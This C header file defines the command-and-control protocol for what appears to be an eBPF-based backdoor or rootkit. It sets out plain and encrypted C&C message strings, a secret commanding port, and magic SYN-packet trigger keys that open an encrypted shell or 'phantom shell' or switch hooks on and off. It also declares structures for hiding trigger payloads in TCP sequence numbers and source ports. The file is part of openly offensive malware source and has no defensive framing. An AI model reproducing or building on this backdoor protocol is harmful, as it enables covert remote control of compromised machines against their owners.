#ifndef __BPF_CC_H
#define __BPF_CC_H

//C&C V0 & V1 --> Unencrypted transmission with RAW sockets, no TCP conn
//Protocol messages are also used inside the secure channel of V2 & V3 backdoor
#define CC_PROT_BASELINE "CC_"
#define CC_PROT_SYN "CC_SYN"
#define CC_PROT_ACK "CC_ACK"
#define CC_PROT_MSG "CC_MSG#"
#define CC_PROT_FIN_PART "CC_FIN"
#define CC_PROT_ERR "CC_ERR"
#define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART
#define CC_PROT_BASH_COMMAND_REQUEST "CC_COMM_RQ#"
#define CC_PROT_BASH_COMMAND_RESPONSE "CC_COMM_RS#"
#define CC_CLIENT_SECRET_COMMANDING_PORT_DEFAULT 8000

//C&C V1 & V2 --> bpv47-like trigger + encrypted shell in V2
#define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
#define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL "\x1D\x25"
#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL "\x1D\x24"
#define CC_TRIGGER_SYN_PACKET_KEY_3_PHANTOM_SHELL "\x4E\x14"
#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02

#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
#define CC_PROT_COMMAND_HOOK_ACTIVATE_ALL 1
#define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
#define CC_PROT_COMMAND_PHANTOM_SHELL 3

//Phantom shell
#define CC_PROT_PHANTOM_SHELL_INIT "CC_PHANTOM_INIT"
#define CC_PROT_PHANTOM_COMMAND_REQUEST "CC_PHAN_RQ#"
#define CC_PROT_PHANTOM_COMMAND_RESPONSE "CC_PHAN_RS#"
#define CC_PROT_PHANTOM_COMMAND_MAX_LEN 8

//C&C V3 -- Distributed hidden payload in packet stream + encrypted shell
struct trigger_32_t {
    unsigned int seq_raw;
};
struct trigger_16_t {
    unsigned short src_port;
};
#define CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM 12
#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM 4
#define CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT 12
#define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT 2
#define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL


#endif